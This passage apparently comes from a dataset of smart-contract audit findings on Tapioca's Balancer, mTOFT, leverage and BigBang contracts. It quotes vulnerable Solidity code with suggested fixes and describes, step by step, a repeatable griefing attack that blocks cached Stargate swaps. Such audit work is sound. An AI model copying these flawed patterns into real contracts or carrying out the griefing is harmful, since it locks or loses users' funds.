It allows for locking up wrong tokens inside the mTOFT contract causing irreversible loss of funds.,"```\\n## Balancer.sol\\n\\nfunction _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n> bytes memory _data\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n }\\n {\\n> (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n```\\n" +Gas parameters for Stargate swap are hardcoded leading to stuck messages,medium,"The `dstGasForCall` for transferring erc20s through Stargate is hardcoded to 0 in the `Balancer` contract leading to `sgReceive` not being called during Stargate swap. As a consequence, the `sgReceive` has to be manually called to clear the `cachedSwapLookup` mapping, but this can be DoSed due to the fact that the `mTOFT::sgReceive` doesn't validate any of its parameters. This can be exploited to perform a long-term DoS attack.\\nGas parameters for Stargate\\nStargate Swap allows the caller to specify the:\\n`dstGasForCall` which is the gas amount forwarded while calling the `sgReceive` on the destination contract.\\n`dstNativeAmount` and `dstNativeAddr` which is the amount and address where the native token is sent to.\\nInside the `Balancer.sol` contract, the `dstGasForCall` is hardcoded to 0. 
The `dstGasForCall` gets forwarded from Stargate `Router` into the Stargate `Bridge` contract.\\n```\\n function swap(\\n uint16 _chainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n Pool.CreditObj memory _c,\\n Pool.SwapObj memory _s,\\n IStargateRouter.lzTxObj memory _lzTxParams, \\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable onlyRouter {\\n bytes memory payload = abi.encode(TYPE_SWAP_REMOTE, _srcPoolId, _dstPoolId, _lzTxParams.dstGasForCall, _c, _s, _to, _payload);\\n _call(_chainId, TYPE_SWAP_REMOTE, _refundAddress, _lzTxParams, payload);\\n }\\n\\n function _call(\\n uint16 _chainId,\\n uint8 _type,\\n address payable _refundAddress,\\n IStargateRouter.lzTxObj memory _lzTxParams,\\n bytes memory _payload\\n ) internal {\\n bytes memory lzTxParamBuilt = _txParamBuilder(_chainId, _type, _lzTxParams);\\n uint64 nextNonce = layerZeroEndpoint.getOutboundNonce(_chainId, address(this)) + 1;\\n layerZeroEndpoint.send{value: msg.value}(_chainId, bridgeLookup[_chainId], _payload, _refundAddress, address(this), lzTxParamBuilt);\\n emit SendMsg(_type, nextNonce);\\n }\\n```\\n\\nIt gets encoded inside the payload that is sent through the LayerZero message. The payload gets decoded inside the `Bridge::lzReceive` on destination chain. 
And `dstGasForCall` is forwarded to the `sgReceive` function:\\n```\\n## Bridge.sol\\n\\n function lzReceive(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint64 _nonce,\\n bytes memory _payload\\n ) external override {\\n if (functionType == TYPE_SWAP_REMOTE) {\\n (\\n ,\\n uint256 srcPoolId,\\n uint256 dstPoolId,\\n> uint256 dstGasForCall,\\n Pool.CreditObj memory c,\\n Pool.SwapObj memory s,\\n bytes memory to,\\n bytes memory payload\\n ) = abi.decode(_payload, (uint8, uint256, uint256, uint256, Pool.CreditObj, Pool.SwapObj, bytes, bytes));\\n```\\n\\nIf it is zero like in the `Balancer.sol` contract or its value is too small the `sgReceive` will fail, but the payload will be saved in the `cachedSwapLookup` mapping. At the same time the tokens are transferred to the destination contract, which is the `mTOFT`. Now anyone can call the `sgReceive` manually through the `clearCachedSwap` function:\\n```\\n function clearCachedSwap(\\n uint16 _srcChainId,\\n bytes calldata _srcAddress,\\n uint256 _nonce\\n ) external {\\n CachedSwap memory cs = cachedSwapLookup[_srcChainId][_srcAddress][_nonce];\\n require(cs.to != address(0x0), ""Stargate: cache already cleared"");\\n // clear the data\\n cachedSwapLookup[_srcChainId][_srcAddress][_nonce] = CachedSwap(address(0x0), 0, address(0x0), """");\\n IStargateReceiver(cs.to).sgReceive(_srcChainId, _srcAddress, _nonce, cs.token, cs.amountLD, cs.payload);\\n }\\n```\\n\\nAlthough not the intended behavior there seems to be no issue with erc20 token sitting on the `mTOFT` contract for a shorter period of time.\\nsgReceive\\nThis leads to the second issue. The `sgReceive` function interface specifies the `chainId`, `srcAddress`, and `token`.\\nIn the current implementation, the `sgReceive` function doesn't check any of these parameters. 
In practice this means that anyone can specify the `mTOFT` address as the receiver and initiate Stargate Swap from any chain to the `mTOFT` contract.\\nIn conjunction with the first issue, this opens up the possibility of a DoS attack.\\nLet's imagine the following scenario:\\nRebalancing operation needs to be performed between `mTOFT` on Ethereum and Avalanche that hold `USDC` as the underlying token.\\nRebalancing is initiated from Ethereum but the `sgReceive` on Avalanche fails and 1000 USDCs are sitting on `mTOFT` contract on Avalanche.\\nA griever noticed this and initiated Stargate swap from Ethereum to Avalanche for 1 `USDT` specifying the `mTOFT` contract as the receiver.\\nThis is successful and now `mTOFT` has 1 `USDT` but 999 `USDC` as the griever's transaction has called the `sgRecieve` function that pushed 1 `USDC` to the `TOFTVault`.\\nAs a consequence, the `clearCachedSwap` function fails because it tries to transfer the original 1000 `USDC`.\\n```\\n function sgReceive(uint16, bytes memory, uint256, address, uint256 amountLD, bytes memory) external payable {\\n if (msg.sender != _stargateRouter) revert mTOFT_NotAuthorized();\\n\\n if (erc20 == address(0)) {\\n vault.depositNative{value: amountLD}();\\n } else {\\n> IERC20(erc20).safeTransfer(address(vault), amountLD); // amountLD is the original 1000 USDC\\n }\\n }\\n```\\n\\nThe only solution here is to manually transfer that 1 USDC to the `mTOFT` contract and try calling the `clearCachedSwap` again.\\nThe griever can repeat this process multiple times.","The `dstGasForCall` shouldn't be hardcoded to 0. 
It should be a configurable value that is set by the admin of the `Balancer` contract.\\nTake into account that this value will be different for different chains.\\nThe recommended solution is:\\n```\\n contract Balancer is Ownable {\\n using SafeERC20 for IERC20;\\n\\n// Add the line below\\n mapping(uint16 => uint256) internal sgReceiveGas;\\n\\n// Add the line below\\n function setSgReceiveGas(uint16 eid, uint256 gas) external onlyOwner {\\n// Add the line below\\n sgReceiveGas[eid] = gas;\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n function getSgReceiveGas(uint16 eid) internal view returns (uint256) {\\n// Add the line below\\n uint256 gas = sgReceiveGas[eid];\\n// Add the line below\\n if (gas == 0) revert();\\n// Add the line below\\n return gas;\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Remove the line below\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n// Add the line below\\n IStargateRouterBase.lzTxObj({dstGasForCall: getSgReceiveGas(_dstChainId), dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n```\\n",Hardcoding the `dstGasCall` to 0 in conjuction with not checking the `sgReceive` parameters opens up the possibility of a long-term DoS attack.,"```\\n function swap(\\n uint16 _chainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n Pool.CreditObj memory _c,\\n Pool.SwapObj memory _s,\\n IStargateRouter.lzTxObj memory _lzTxParams, \\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable onlyRouter {\\n bytes memory payload = abi.encode(TYPE_SWAP_REMOTE, _srcPoolId, _dstPoolId, _lzTxParams.dstGasForCall, _c, _s, _to, _payload);\\n _call(_chainId, TYPE_SWAP_REMOTE, _refundAddress, _lzTxParams, payload);\\n }\\n\\n function _call(\\n uint16 _chainId,\\n uint8 _type,\\n address payable _refundAddress,\\n IStargateRouter.lzTxObj memory _lzTxParams,\\n bytes memory _payload\\n ) internal {\\n bytes 
memory lzTxParamBuilt = _txParamBuilder(_chainId, _type, _lzTxParams);\\n uint64 nextNonce = layerZeroEndpoint.getOutboundNonce(_chainId, address(this)) + 1;\\n layerZeroEndpoint.send{value: msg.value}(_chainId, bridgeLookup[_chainId], _payload, _refundAddress, address(this), lzTxParamBuilt);\\n emit SendMsg(_type, nextNonce);\\n }\\n```\\n" +`getCollateral` and `getAsset` functions of the AssetTotsDaiLeverageExecutor contract decode data incorrectly,medium,"See vulnerability detail\\nIn AssetTotsDaiLeverageExecutor contract, `getCollateral` function decodes the data before passing it to `_swapAndTransferToSender` function.\\n```\\nSLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\nuint256 daiAmount =\\n _swapAndTransferToSender(false, assetAddress, daiAddress, assetAmountIn, swapData.swapperData);\\n```\\n\\nHowever, `_swapAndTransferToSender` will decode this data again to obtain the swapperData:\\n```\\nfunction _swapAndTransferToSender(\\n bool sendBack,\\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn,\\n bytes memory data\\n) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\n // rest of code\\n```\\n\\nThe redundant decoding will cause the data to not align as expected, which is different from `SimpleLeverageExecutor.getCollateral()` function (code snippet)","The AssetTotsDaiLeverageExecutor contract should pass data directly to `_swapAndTransferToSender`, similar to the SimpleLeverageExecutor contract",`getCollateral` and `getAsset` of AssetTotsDaiLeverageExecutor will not work as intended due to incorrectly decoding data.,"```\\nSLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\nuint256 daiAmount =\\n _swapAndTransferToSender(false, assetAddress, daiAddress, assetAmountIn, swapData.swapperData);\\n```\\n" +Balancer using safeApprove may lead to revert.,medium,"When executing `Balancer._routerSwap()`, the `oz` `safeApprove` 
function is used to set an allowance. Due to the presence of the `convertRate` in the `router`, `Balancer._routerSwap()` rounds down the incoming quantity. This behavior may result in the allowance not being fully use, causing a subsequent execution of `oz.safeApprove()` to revert.\\nThe code snippet for `Balancer._routerSwap()` is as follows:\\n```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x""\\n );\\n }\\n```\\n\\nIn the above code, `SafeERC20.safeApprove()` from the `oz` library is used, but the allowance is not cleared afterward. 
Consequently, if the current allowance is not fully use during this transaction, a subsequent execution of `SafeERC20.safeApprove()` will revert.\\n```\\n function swap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n uint256 _amountLD,\\n uint256 _minAmountLD,\\n lzTxObj memory _lzTxParams,\\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable override nonReentrant {\\n require(_amountLD > 0, ""Stargate: cannot swap 0"");\\n require(_refundAddress != address(0x0), ""Stargate: _refundAddress cannot be 0x0"");\\n Pool.SwapObj memory s;\\n Pool.CreditObj memory c;\\n {\\n Pool pool = _getPool(_srcPoolId);\\n {\\n uint256 convertRate = pool.convertRate();\\n _amountLD = _amountLD.div(convertRate).mul(convertRate);\\n }\\n\\n s = pool.swap(_dstChainId, _dstPoolId, msg.sender, _amountLD, _minAmountLD, true);\\n _safeTransferFrom(pool.token(), msg.sender, address(pool), _amountLD);\\n c = pool.sendCredits(_dstChainId, _dstPoolId);\\n }\\n bridge.swap{value: msg.value}(_dstChainId, _srcPoolId, _dstPoolId, _refundAddress, c, s, _lzTxParams, _to, _payload);\\n }\\n```\\n","```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x""\\n );\\n// Add the line below\\n IERC20(_erc20).safeApprove(address(router), 0);\\n```\\n",Unused allowance may lead to failure in subsequent `_routerSwap()` executions.,"```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 
_srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x""\\n );\\n }\\n```\\n" +buyCollateral() does not work properly,medium,"The `BBLeverage.buyCollateral()` function does not work as expected.\\nThe implementation of `BBLeverage.buyCollateral()` is as follows:\\n```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n if (address(leverageExecutor) == address(0)) {\\n revert LeverageExecutorNotValid();\\n }\\n\\n // Stack too deep fix\\n _BuyCollateralCalldata memory calldata_;\\n _BuyCollateralMemoryData memory memoryData;\\n {\\n calldata_.from = from;\\n calldata_.borrowAmount = borrowAmount;\\n calldata_.supplyAmount = supplyAmount;\\n calldata_.data = data;\\n }\\n\\n {\\n uint256 supplyShare = yieldBox.toShare(assetId, calldata_.supplyAmount, true);\\n if (supplyShare > 0) {\\n (memoryData.supplyShareToAmount,) =\\n yieldBox.withdraw(assetId, calldata_.from, address(leverageExecutor), 0, supplyShare);\\n }\\n }\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n 
address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n address(asset).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n\\nThe code above has several issues:\\n`leverageExecutor.getCollateral()` receiver should be `address(this)`. ---> for 2th step deposit to YB\\n`address(asset).safeApprove()` should use `address(collateral).safeApprove()`.\\n`yieldBox.depositAsset()` receiver should be `calldata_.from`. ----> for next execute addCollateral(calldata.from)\\nNote: SGLLeverage.sol have same issue","```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n// rest of code.\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount // Add the line below\\n memoryData.borrowShareToAmount,\\n// Remove the line below\\n calldata_.from,\\n// Add the line below\\n address(this),\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, 
amountOut, false);\\n// Remove the line below\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n// Remove the line below\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n// Remove the line below\\n address(asset).safeApprove(address(yieldBox), 0);\\n// Add the line below\\n address(collateral).safeApprove(address(yieldBox), type(uint256).max);\\n// Add the line below\\n yieldBox.depositAsset(collateralId, address(this), calldata_.from, 0, collateralShare);\\n// Add the line below\\n address(collateral).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n",`buyCollateral()` does not work properly.,"```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n if (address(leverageExecutor) == address(0)) {\\n revert LeverageExecutorNotValid();\\n }\\n\\n // Stack too deep fix\\n _BuyCollateralCalldata memory calldata_;\\n _BuyCollateralMemoryData memory memoryData;\\n {\\n calldata_.from = from;\\n calldata_.borrowAmount = borrowAmount;\\n calldata_.supplyAmount = supplyAmount;\\n calldata_.data = data;\\n }\\n\\n {\\n uint256 supplyShare = yieldBox.toShare(assetId, calldata_.supplyAmount, true);\\n if (supplyShare > 0) {\\n (memoryData.supplyShareToAmount,) =\\n yieldBox.withdraw(assetId, calldata_.from, address(leverageExecutor), 0, supplyShare);\\n }\\n }\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, 
address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n address(asset).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n" +DoS in BBLeverage and SGLLeverage due to using wrong leverage executor interface,medium,"A DoS takes place due to utilizing a wrong interface in the leverage modules.\\n`BBLeverage.sol` and `SGLLeverage.sol` use a wrong interface to interact with the `leverageExecutor` contract. 
This will make the `sellCollateral()` and `buyCollateral()` functions always fail and render the `BBLeverage.sol` and `SGLLeverage.sol` unusable.\\nAs we can see in the following snippets, when these contracts interact with the `leverageExecutor` to call its `getAsset()` and `getCollateral()` functions, they do it passing 6 parameters in each of the functions:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n // rest of code\\n }\\n \\n function sellCollateral(address from, uint256 share, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageSell)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n // rest of code\\n\\n amountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), memoryData.leverageAmount, from, data\\n ); \\n\\n // rest of code\\n } \\n```\\n\\nHowever, the leverage executor's `getAsset()` and `getCollateral()` functions have just 4 parameters, as seen in the `BaseLeverageExecutor.sol` base contract used to build all leverage executors:\\n```\\n// BaseLeverageExecutor.sol\\n\\n/**\\n * @notice Buys an asked amount of collateral with an asset using the ZeroXSwapper.\\n * @dev Expects the token to be already transferred to this contract.\\n * @param assetAddress asset address.\\n * @param collateralAddress collateral address.\\n * @param assetAmountIn amount to swap.\\n * @param data SLeverageSwapData.\\n */\\n function getCollateral(address assetAddress, address collateralAddress, uint256 assetAmountIn, bytes 
calldata data)\\n external\\n payable\\n virtual\\n returns (uint256 collateralAmountOut)\\n {}\\n\\n /**\\n * @notice Buys an asked amount of asset with a collateral using the ZeroXSwapper.\\n * @dev Expects the token to be already transferred to this contract.\\n * @param collateralAddress collateral address.\\n * @param assetAddress asset address.\\n * @param collateralAmountIn amount to swap.\\n * @param data SLeverageSwapData.\\n */\\n function getAsset(address collateralAddress, address assetAddress, uint256 collateralAmountIn, bytes calldata data)\\n external\\n virtual\\n returns (uint256 assetAmountOut)\\n {}\\n```\\n",Update the interface used in BBLeverage.sol and SGLLeverage.sol and pass the proper parameters so that calls can succeed.,"High. Calls to the leverage modules will always fail, rendering these features unusable.","```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n // rest of code\\n }\\n \\n function sellCollateral(address from, uint256 share, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageSell)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n // rest of code\\n\\n amountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), memoryData.leverageAmount, from, data\\n ); \\n\\n // rest of code\\n } \\n```\\n" +Variable opening fee will always be wrongly computed if collateral is not a stablecoin,medium,"Borrowing fees will be computed wrongly because of a combination of hardcoded values and a 
wrongly implemented setter function.\\nTapioca applies a linearly scaling creation fee to open a new CDP in Big Bang markets. This is done via the internal `_computeVariableOpeningFee()` function every time a new borrow is performed.\\nIn order to compute the variable fee, the exchange rate will be queried. This rate is important in order to understand the current price of USDO related to the collateral asset.\\nIf `_exchangeRate >= minMintFeeStart`, then `minMintFee` will be applied.\\nIf `_exchangeRate <= maxMintFeeStart`, then `maxMintFee` will be applied\\nOtherwise, a proportional percentage will be applied to compue the fee\\nAs per the comment in the code snippet shows below, Tapioca wrongly assumes that the exchange rate will always be `USDO <> USDC`, when in reality the actual collateral will dictate the exchange rate returned.\\nIt is also important to note the fact that contrary to what one would assume, `maxMintFeeStart` is assumed to be smaller than `minMintFeeStart` in order to perform the calculations:\\n```\\n// BBLendingCommon.sol\\n\\nfunction _computeVariableOpeningFee(uint256 amount) internal returns (uint256) {\\n if (amount == 0) return 0; \\n \\n //get asset <> USDC price ( USDO <> USDC ) \\n (bool updated, uint256 _exchangeRate) = assetOracle.get(oracleData); \\n if (!updated) revert OracleCallFailed();\\n \\n if (_exchangeRate >= minMintFeeStart) { \\n return (amount * minMintFee) / FEE_PRECISION;\\n }\\n if (_exchangeRate <= maxMintFeeStart) { \\n return (amount * maxMintFee) / FEE_PRECISION;\\n }\\n \\n uint256 fee = maxMintFee\\n - (((_exchangeRate - maxMintFeeStart) * (maxMintFee - minMintFee)) / (minMintFeeStart - maxMintFeeStart)); \\n \\n if (fee > maxMintFee) return (amount * maxMintFee) / FEE_PRECISION;\\n if (fee < minMintFee) return (amount * minMintFee) / FEE_PRECISION;\\n\\n if (fee > 0) {\\n return (amount * fee) / FEE_PRECISION;\\n }\\n return 0;\\n }\\n```\\n\\nIt is also important to note that `minMintFeeStart` and 
`maxMintFeeStart` are hardcoded when being initialized inside `BigBang.sol` (as mentioned, `maxMintFeeStart` is smaller than minMintFeeStart):\\n```\\n// BigBang.sol\\n\\nfunction _initCoreStorage(\\n IPenrose _penrose,\\n IERC20 _collateral,\\n uint256 _collateralId,\\n ITapiocaOracle _oracle,\\n uint256 _exchangeRatePrecision,\\n uint256 _collateralizationRate,\\n uint256 _liquidationCollateralizationRate,\\n ILeverageExecutor _leverageExecutor\\n ) private {\\n // rest of code\\n \\n maxMintFeeStart = 975000000000000000; // 0.975 *1e18\\n minMintFeeStart = 1000000000000000000; // 1*1e18\\n\\n // rest of code\\n } \\n```\\n\\nWhile the values hardcoded initially to values that are coherent for a USDO <> stablecoin exchange rate, these values won't make sense if we find ourselves fetching an exchcange rate of an asset not stable.\\nLet's say the collateral asset is ETH. If ETH is at 4000$, then the exchange rate will return a value of 0,00025. This will make the computation inside `_computeVariableOpeningFee()` always apply the maximum fee when borrowing because `_exchangeRate` is always smaller than `maxMintFeeStart` by default.\\nAlthough this has an easy fix (changing the values stored in `maxMintFeeStart` and minMintFeeStart), this can't be properly done because the `setMinAndMaxMintRange()` function wrongly assumes that `minMintFeeStart` must be smaller than `maxMintFeeStart` (against what the actual calculations dictate in the _computeVariableOpeningFee()):\\n```\\n// BigBang.sol\\n\\nfunction setMinAndMaxMintRange(uint256 _min, uint256 _max) external onlyOwner {\\n emit UpdateMinMaxMintRange(minMintFeeStart, _min, maxMintFeeStart, _max);\\n\\n if (_min >= _max) revert NotValid(); \\n\\n minMintFeeStart = _min;\\n maxMintFeeStart = _max;\\n } \\n```\\n\\nThis will make it impossible to properly update the `maxMintFeeStart` and `minMintFeeStart` to have proper values because if it is enforced that `maxMintFeeStart` > than `minMintFeeStart`, then 
`_computeVariableOpeningFee()` will always enter the first `if (_exchangeRate >= minMintFeeStart)` and wrongly return the minimum fee.","The mitigation for this is straightforward. Change the `setMinAndMaxMintRange()` function so that `_max` is enforced to be smaller than _min:\\n```\\n// BigBang.sol\\n\\nfunction setMinAndMaxMintRange(uint256 _min, uint256 _max) external onlyOwner {\\n emit UpdateMinMaxMintRange(minMintFeeStart, _min, maxMintFeeStart, _max);\\n\\n// Remove the line below\\n if (_min >= _max) revert NotValid(); \\n// Add the line below\\n if (_max >= _min) revert NotValid(); \\n\\n minMintFeeStart = _min;\\n maxMintFeeStart = _max;\\n } \\n```\\n\\nAlso, I would recommend not to hardcode the values of `maxMintFeeStart` and `minMintFeeStart` and pass them as parameter instead, inside `_initCoreStorage()` , as they should always be different considering the collateral configured for that market.","Medium. Although this looks like a bug that doesn't have a big impact in the protocol, it actually does. The fees will always be wrongly applied for collaterals different from stablecoins, and applying these kind of fees when borrowing is one of the core mechanisms to keep USDO peg, as described in Tapioca's documentation. 
If this mechanisms doesn't work properly, users won't be properly incentivized to borrow/repay considering the different market conditions that might take place and affect USDO's peg to $1.","```\\n// BBLendingCommon.sol\\n\\nfunction _computeVariableOpeningFee(uint256 amount) internal returns (uint256) {\\n if (amount == 0) return 0; \\n \\n //get asset <> USDC price ( USDO <> USDC ) \\n (bool updated, uint256 _exchangeRate) = assetOracle.get(oracleData); \\n if (!updated) revert OracleCallFailed();\\n \\n if (_exchangeRate >= minMintFeeStart) { \\n return (amount * minMintFee) / FEE_PRECISION;\\n }\\n if (_exchangeRate <= maxMintFeeStart) { \\n return (amount * maxMintFee) / FEE_PRECISION;\\n }\\n \\n uint256 fee = maxMintFee\\n - (((_exchangeRate - maxMintFeeStart) * (maxMintFee - minMintFee)) / (minMintFeeStart - maxMintFeeStart)); \\n \\n if (fee > maxMintFee) return (amount * maxMintFee) / FEE_PRECISION;\\n if (fee < minMintFee) return (amount * minMintFee) / FEE_PRECISION;\\n\\n if (fee > 0) {\\n return (amount * fee) / FEE_PRECISION;\\n }\\n return 0;\\n }\\n```\\n" +Not properly tracking debt accrual leads mintOpenInterestDebt() to lose twTap rewards,medium,"Debt accrual is tracked wrongly, making the expected twTap rewards to be potentially lost.\\nPenrose's `mintOpenInterestDebt()` function allows USDO to be minted and distributed as a reward to twTap holders based on the current USDO open interest.\\nIn order to mint and distribute rewards, `mintOpenInterestDebt()` will perform the following steps:\\nQuery the current `USDO.supply()`\\nCompute the total debt from all the markets (Origins included)\\nIf `totalUsdoDebt > usdoSupply`, then distribute the difference among the twTap holders\\n```\\nfunction mintOpenInterestDebt(address twTap) external onlyOwner { \\n uint256 usdoSupply = usdoToken.totalSupply();\\n\\n // nothing to mint when there's no activity\\n if (usdoSupply > 0) { \\n // re-compute latest debt\\n uint256 totalUsdoDebt = 
